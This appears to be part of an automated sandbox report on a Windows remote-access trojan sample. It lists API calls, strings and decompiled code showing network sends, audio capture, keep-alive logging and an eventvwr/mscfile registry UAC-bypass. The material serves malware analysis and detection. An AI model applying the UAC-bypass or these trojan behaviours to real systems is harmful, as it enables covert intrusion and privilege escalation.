                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                        • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                        • send.WS2_32(?,00000000), ref: 004024BB
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024C7
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024D1
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024EB
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024F5
                                        • send.WS2_32(?,00000000), ref: 004024FF
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402509
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$?length@?$basic_string@$??1?$basic_string@$?data@?$basic_string@A?$basic_string@send$??0?$basic_string@?c_str@?$basic_string@?empty@?$basic_string@D@1@@V01@V01@@Y?$basic_string@
                                        • String ID: [DataStart]
                                        • API String ID: 1403384299-3852763199
                                        • Opcode ID: a6039b55a21c89a02e1cf1528b19330316269f3f8a1329a8a34a52ca146de8b9
                                        • Instruction ID: 4f95a53d81068631c3648da1c5498cf22458e2818172e99049c3d90a1b667ab5
                                        • Opcode Fuzzy Hash: a6039b55a21c89a02e1cf1528b19330316269f3f8a1329a8a34a52ca146de8b9
                                        • Instruction Fuzzy Hash: 7621EA72500509EBCB05DF90DD599EE7778EB98342F108176E907A61E0DB705E44CFA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040123B
                                        • closesocket.WS2_32 ref: 00401266
                                        • ExitThread.KERNEL32 ref: 00401274
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000020,?,0041B310,00000000), ref: 0040129D
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(0041B218,00000012,?,0041B310,00000000), ref: 004012B3
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012BE
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012CB
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012D8
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012E5
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004012F1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004012FA
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401303
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040130C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401315
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040131E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401327
                                        • waveInUnprepareHeader.WINMM(-0041B1DC,00000020), ref: 00401344
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401369
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004013B3
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$D@1@@$V01@@$??4?$basic_string@ExitHeaderThreadUnprepareV01@closesocketwave
                                        • String ID:
                                        • API String ID: 3470141593-0
                                        • Opcode ID: e0d2f9db34cf0629cb1e285ec2437386fbdd7813bf54cbf6243c0989171c965f
                                        • Instruction ID: 5b0032f0df5236073d26c2de6242c8c0ab4ccdf0beb3001a3256587e9f107884
                                        • Opcode Fuzzy Hash: e0d2f9db34cf0629cb1e285ec2437386fbdd7813bf54cbf6243c0989171c965f
                                        • Instruction Fuzzy Hash: 7741347290010DEBDB01EBE1ED5EEDE7778EB54345F108136F902A31A1DB745A48CB99
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 28%
                                        			E00402637(void* __ecx, intOrPtr _a4) {
                                        				char _v5;
                                        				struct _SYSTEMTIME _v24;
                                        				char _v40;
                                        				char _v56;
                                        				char* _t42;
                                        				char* _t43;
                                        				char* _t50;
                                        				char* _t51;
                                        				void* _t68;
                                        				void* _t69;
                                        
                                        				_t68 = __ecx;
                                        				if( *((char*)(__ecx + 0x38)) == 0) {
                                        					return 0;
                                        				}
                                        				if( *0x41bcac != 0) {
                                        					if( *((char*)(__ecx + 0x44)) != 0) {
                                        						GetLocalTime( &_v24);
                                        						_t50 =  &_v5;
                                        						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t50, "KeepAlive Enabled! Timeout: %i seconds\n", _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMilliseconds & 0x0000ffff, _a4);
                                        						_t51 =  &_v40;
                                        						L00414170();
                                        						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t51, _t50);
                                        						printf(_t51);
                                        						_t69 = _t69 + 0x24;
                                        						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        						 *(_t68 + 0x44) =  *(_t68 + 0x44) & 0x00000000;
                                        					}
                                        					_t16 = _t68 + 0x3c; // 0x0
                                        					if( *_t16 != _a4) {
                                        						GetLocalTime( &_v24);
                                        						_t42 =  &_v5;
                                        						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t42, "KeepAlive Timeout changed to %i\n", _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMilliseconds & 0x0000ffff, _a4);
                                        						_t43 =  &_v56;
                                        						L00414170();
                                        						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t43, _t42);
                                        						printf(_t43);
                                        						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					}
                                        				}
                                        				 *(_t68 + 0x40) =  *(_t68 + 0x40) & 0x00000000;
                                        				 *((intOrPtr*)(_t68 + 0x3c)) = _a4;
                                        				return 1;
                                        			}


                                        APIs
                                        • GetLocalTime.KERNEL32(?,?,00000000,0041BE70), ref: 0040266F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Enabled! Timeout: %i seconds,?,?,?,?,?,?,00000000,0041BE70), ref: 00402699
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00000000,0041BE70), ref: 004026A4
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000,0041BE70,?,?,?,?,?,?,?,?,?,?,?,?,0040D49C), ref: 004026AE
                                        • printf.MSVCRT ref: 004026B5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004026BD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004026C6
                                        • GetLocalTime.KERNEL32(?,?,00000000,0041BE70), ref: 004026DC
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Timeout changed to %i,?,?,?,?,?,?,00000000,0041BE70), ref: 00402706
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00000000,0041BE70), ref: 00402711
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000,0041BE70,?,?,?,?,?,?,?,?,?,?,?,?,0040D49C), ref: 0040271B
                                        • printf.MSVCRT ref: 00402722
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040272A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402733
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalTimeV10@V?$basic_string@printf
                                        • String ID: %02i:%02i:%02i:%03i [INFO] $KeepAlive Enabled! Timeout: %i seconds$KeepAlive Timeout changed to %i
                                        • API String ID: 1710008465-2297210016
                                        • Opcode ID: 45bbf99334adb761e407a604f487fabbbe6a046893022ab2e2554ba2dfb37768
                                        • Instruction ID: 321b724c115d66eaa185a9bbc978540a18db294c5fd1e2a1f117f764d6d2d181
                                        • Opcode Fuzzy Hash: 45bbf99334adb761e407a604f487fabbbe6a046893022ab2e2554ba2dfb37768
                                        • Instruction Fuzzy Hash: 33313672800608FFCB10DBE4DD49AEEB7BCAF54705F104466F941E3190D7B9AA85CB68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040313B
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 00403144
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040314E
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 00403159
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040316A
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,?), ref: 0040318F
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 004031BF
                                        • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 004031CC
                                        • exit.MSVCRT ref: 004031D8
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004031E1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004031EA
                                        Strings
                                        • origmsc, xrefs: 00403160
                                        • mscfile\shell\open\command, xrefs: 0040311C
                                        • Software\Classes\mscfile\shell\open\command, xrefs: 0040319B
                                        • open, xrefs: 004031C6
                                        • C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe, xrefs: 0040318A
                                        • eventvwr.exe, xrefs: 004031A6
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$?c_str@?$basic_string@$G@2@@std@@G@std@@$??1?$basic_string@?length@?$basic_string@$??0?$basic_string@ExecuteG@1@@Shellexit
                                        • String ID: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                        • API String ID: 2587331422-3334443473
                                        • Opcode ID: ab8c026c616f89140a8e0c9c5cf730ebb06390fe504552328b2b6a206b9bb02a
                                        • Instruction ID: 58015f3fb9c85f75900a894e30fbe76f83cf12f03c76df5784ad0d5e993c1cb0
                                        • Opcode Fuzzy Hash: ab8c026c616f89140a8e0c9c5cf730ebb06390fe504552328b2b6a206b9bb02a
                                        • Instruction Fuzzy Hash: 25219A72640505FBD700ABA1DD8AEEF772CDB84745F10407AF512B61D0DBB85A4187BD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(override,00000000), ref: 00409D63
                                          • Part of subcall function 0040B4C8: RegOpenKeyExA.KERNELBASE(80000001,00408EBE,00000000,00020019,00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E), ref: 0040B4E7
                                          • Part of subcall function 0040B4C8: RegQueryValueExA.ADVAPI32(00408EBE,?,00000000,80000001,?,00000000,0041BCB0,?,?,?,00408EBE,80000001,00000000), ref: 0040B505
                                          • Part of subcall function 0040B4C8: RegCloseKey.ADVAPI32(00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E,00415774), ref: 0040B510
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BA28,?,?,?,00000001), ref: 00409D96
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(pth_unenc,?,?,?,00000001), ref: 00409DB3
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409DC6
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(2.7.2 Pro,?), ref: 00409DDC
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(004166F0), ref: 00409DE5
                                        • Sleep.KERNEL32(00000BB8), ref: 00409DFA
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BA28,?,?,?,00000001), ref: 00409E11
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(pth_unenc,?,?,?,00000001), ref: 00409E2E
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409E41
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(2.7.2 Pro,?), ref: 00409E57
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(004166F0), ref: 00409E60
                                        • exit.MSVCRT ref: 00409E77
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$?c_str@?$basic_string@D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@D@1@@V01@@$CloseOpenQuerySleepValueexit
                                        • String ID: 2.7.2 Pro$override$pth_unenc
                                        • API String ID: 3602623569-3893205188
                                        • Opcode ID: 8228ca575d73922a3ee67361cb50e71d0985c32122b88b91f319b4381fe8a494
                                        • Instruction ID: 2889bc0b5ca8399aadfd957be20fb2b9bea035d2a19627ad42be5e9aadac3fca
                                        • Opcode Fuzzy Hash: 8228ca575d73922a3ee67361cb50e71d0985c32122b88b91f319b4381fe8a494
                                        • Instruction Fuzzy Hash: 2E31B772A50604BBD70477E59C4AEFE776DEF84740F44002AF911971D1DFB8498187AE
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,00416980), ref: 0040D665
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000003), ref: 0040D68C
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D69F
                                          • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D6BA
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D6C3
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D6D9
                                          • Part of subcall function 00412E4E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000,0041BCB0,?,004057B5), ref: 00412E5A
                                          • Part of subcall function 00412E4E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,004057B5), ref: 00412E64
                                          • Part of subcall function 00412E4E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00412E78
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040D6F3
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001), ref: 0040D704
                                        • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040D711
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040D71A
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,0041697C), ref: 0040D734
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D74B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                          • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                          • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                          • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                          • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                          • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                        Strings
                                        • open, xrefs: 0040D70B
                                        • C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe, xrefs: 0040D752
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@2@@std@@G@std@@$?c_str@?$basic_string@$??1?$basic_string@$??0?$basic_string@$??8std@@D@2@@0@G@1@@V01@@V?$basic_string@$??2@??3@?length@?$basic_string@?size@?$basic_string@ExecuteShell
                                        • String ID: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe$open
                                        • API String ID: 2112629403-882194827
                                        • Opcode ID: bfc1775c8f745b7d6fcee80a42c2b94f25023e4fd720e9b865f493a23bd22e86
                                        • Instruction ID: 3c6387fd113382c931602557de23b741b53e110e960cdbc023917b4df3b65b40
                                        • Opcode Fuzzy Hash: bfc1775c8f745b7d6fcee80a42c2b94f25023e4fd720e9b865f493a23bd22e86
                                        • Instruction Fuzzy Hash: 94317C72910519EBCB04BBE1EC999FE7778AF54356B40487EF412A30E1EE785A04CB28
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetKeyboardLayoutNameA.USER32(00000000), ref: 0040D9AF
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D9BA
                                          • Part of subcall function 00412E83: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412E9D
                                          • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                          • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012,?,00000000,00000000,?,?,00000000,00000000), ref: 0040D9FC
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 0040DA11
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 0040DA21
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA31
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA3E
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA4B
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA55
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000012), ref: 0040DA6C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA75
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA81
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA8D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA99
